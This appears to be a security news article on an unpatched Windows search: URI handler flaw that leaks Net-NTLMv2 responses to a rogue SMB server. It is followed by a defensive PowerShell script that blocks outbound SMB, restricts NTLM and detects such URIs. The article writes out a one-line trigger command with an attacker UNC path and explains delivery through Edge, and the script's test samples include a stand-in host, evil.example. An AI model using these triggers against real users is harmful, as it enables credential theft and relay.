A newly disclosed flaw in the Windows search: URI handler lets an attacker-controlled SMB server capture a victim's Net-NTLMv2 challenge-response (commonly called the NTLMv2 hash) after a single link click. The issue mirrors a bug Microsoft patched in the Snipping Tool, CVE-2026-33829, but this variant has not been assigned a CVE and has not been fixed by Microsoft.
Understanding the Windows URI Vulnerability
On April 14, 2026, Microsoft addressed CVE-2026-33829, a flaw in the Snipping Tool's URI handler that exposed NTLM credentials. An attacker could craft an ms-screensketch: URI whose filePath parameter pointed to a remote UNC path; opening it made the client authenticate to that path over SMB automatically, sending the user's Net-NTLMv2 response to the attacker, who can then crack it offline or relay it.
Huntress, a cybersecurity firm, found that the Windows search: URI handler exposes the same mechanism. Pointing the crumb=location parameter of a search: URI at a UNC path, rather than the filePath parameter used in the Snipping Tool case, produces the same Net-NTLMv2 leak to a rogue SMB endpoint. Huntress reproduced the issue on Windows 11 25H2 Pro with default settings, so no unusual configuration is needed for a host to be exposed.
How the Flaw is Exploited
Exploitation only requires a user to open a seemingly harmless link; the machine then attempts to authenticate to the attacker's SMB server on its own. From a command prompt the trigger is a single command of the form start "" "search:query=test&crumb=location:\\10.0.1.100\share", where \\10.0.1.100\share is the attacker's UNC path. Only the first such click in a logon session leaks the hash; later clicks in the same session do not produce a fresh authentication attempt, so the attacker gets one chance per session.
The URI can also be delivered through a browser: in Microsoft Edge, loading the search: URI triggers the SMB authentication attempt without any prompt to the user. Because the search: and search-ms: schemes share the same command line and CLSID mapping, both are affected, and a fix would have to land in the handler itself (SearchExecute or ExplorerFrame.dll) rather than in any single calling application.
Mitigation and Security Recommendations
Despite the similarity to the patched Snipping Tool flaw, Microsoft has not fixed the search URI handler, saying the issue falls below its servicing threshold. Huntress recommends blocking outbound SMB (TCP 445 and 139) from hosts that do not need it as the primary countermeasure, since a UNC crumb that cannot reach the attacker's server cannot leak anything. Additional measures are enforcing SMB signing (which blocks relay of a captured exchange but not offline cracking of it), restricting or disabling outgoing NTLM, and monitoring process creation logs for search: or search-ms: URIs whose crumb=location value is a UNC path.
Together these controls substantially reduce exposure to this whole class of NTLM leak, not just the search: handler. Staying informed and applying such hardening proactively remains essential to protecting organizational and personal data.
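The following PowerShell script is an added example, not code from the article or from Huntress. It applies the three host-side mitigations above and then hunts for launches of search: or search-ms: URIs that carry a UNC crumb. The firewall rule name, the choice to start NTLM restriction in audit mode, and the sample command lines it matches against are this example's own assumptions; run it elevated on a test host first.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the article or from Huntress): harden a Windows host against
# search: / search-ms: URI NTLM leaks and hunt for attempted launches. The rule name, the
# audit-first registry value and the sample command lines are this example's assumptions.

# --- 1. Block outbound SMB so a UNC crumb can never reach an external server -------------
# Block rules take precedence over allow rules in Windows Firewall, so rather than adding
# exceptions, keep hosts that must reach file servers out of the GPO scope for this rule.
$ruleName = 'Block outbound SMB (NTLM leak mitigation)'
if (-not (Get-NetFirewallRule -DisplayName $ruleName -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName $ruleName -Direction Outbound -Action Block `
        -Protocol TCP -RemotePort 445, 139 -RemoteAddress Any -Profile Any | Out-Null
}

# --- 2. Restrict outgoing NTLM ------------------------------------------------------------
# RestrictSendingNTLMTraffic: 0 = allow, 1 = audit (event 8001 in
# Microsoft-Windows-NTLM/Operational), 2 = deny. Audit first to find legitimate NTLM
# dependencies, then switch the value to 2.
$msv = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
Set-ItemProperty -Path $msv -Name RestrictSendingNTLMTraffic -Value 1 -Type DWord

# --- 3. Require SMB signing on the client -------------------------------------------------
# Signing stops a captured exchange from being relayed to another server; it does not stop
# the Net-NTLMv2 response from leaving the host, so it complements step 1 rather than
# replacing it.
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force

# --- 4. Hunt for search: / search-ms: URIs whose crumb=location is a UNC path -------------
# Matches either scheme, any preceding query parameters, and a crumb value beginning with \\.
$uncCrumb = [regex]'(?i)search(-ms)?:[^"\s]*crumb=location:\\\\[^\\\s"]+'

function Test-SearchUriCrumb {
    param([string]$CommandLine)
    $m = $uncCrumb.Match($CommandLine)
    if ($m.Success) { return $m.Value } else { return $null }
}

# Constructed sample command lines (not real telemetry) to exercise the matcher offline.
# The third one uses a local path as its crumb and must not be flagged.
$samples = @(
    'cmd.exe /c start "" "search:query=test&crumb=location:\\10.0.1.100\share"',
    '"C:\Windows\explorer.exe" "search-ms:displayname=Results&crumb=location:\\evil.example\pub"',
    '"C:\Windows\explorer.exe" "search:query=invoice&crumb=location:C:\Users\Public"'
)
foreach ($s in $samples) {
    $hit = Test-SearchUriCrumb $s
    '{0}  <=  {1}' -f ($(if ($hit) { 'SUSPICIOUS' } else { 'ok        ' }), $s)
}

# Live version: requires "Audit Process Creation" and "Include command line in process
# creation events" so that event 4688 carries the command line. Sysmon event 1 in
# Microsoft-Windows-Sysmon/Operational can be queried the same way.
function Find-SearchUriLaunch {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $hit = Test-SearchUriCrumb $_.Message
            if ($hit) {
                [pscustomobject]@{ Time = $_.TimeCreated; Uri = $hit; Message = $_.Message }
            }
        }
}
Find-SearchUriLaunch | Format-Table Time, Uri -AutoSize
```

The regex deliberately matches only crumbs that begin with two backslashes, so ordinary local searches (the third sample) are not flagged; widen it if your environment also wants to see search-ms: URIs that reference non-UNC but unexpected locations. Because the leak happens once per logon session, a single 4688 hit is already worth an investigation rather than a count-based threshold.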
